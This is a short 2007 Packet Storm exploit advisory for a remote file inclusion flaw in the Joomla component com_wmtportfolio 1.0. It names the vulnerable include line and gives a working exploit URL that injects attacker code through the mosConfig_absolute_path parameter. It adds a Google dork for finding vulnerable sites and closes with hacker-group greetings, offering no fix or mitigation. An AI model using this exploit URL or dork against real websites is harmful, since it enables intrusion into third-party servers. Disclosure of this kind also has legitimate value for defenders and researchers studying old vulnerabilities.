joomlawmtport-rfi.txt

2007-10-08T00:00:00
ID PACKETSTORM:59877
Type packetstorm
Reporter NoGe
Modified 2007-10-08T00:00:00

Description

                                        
                                            `# wmtportfolio joomla component 1.0 Remote File Include Vulnerability  
  
Component : com_wmtportfolio version 1.0  
Download script : http://www.webmaster-tips.net/  
Dicovered by : NoGe  
Contact : pace.noge@hotmail.com  
  
==================================================================================================================================  
  
# Vulnerable found in /administrator/components/com_wmtportfolio/admin.wmtportfolio.php  
  
line 5 include( $mosConfig_absolute_path . "/components/com_wmtportfolio/additems.php" );  
  
  
# Exploit  
  
  
http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]  
  
  
# google dork  
  
inurl:com_wmtportfolio  
  
==================================================================================================================================  
  
# Greetz  
  
[-] all crew #papuahacker #nyubicrew #baliemhackerlink  
[-] skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie  
[-] yooogy Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq  
[-] http://kapukvalley.net member  
  
==================================================================================================================================   
  
`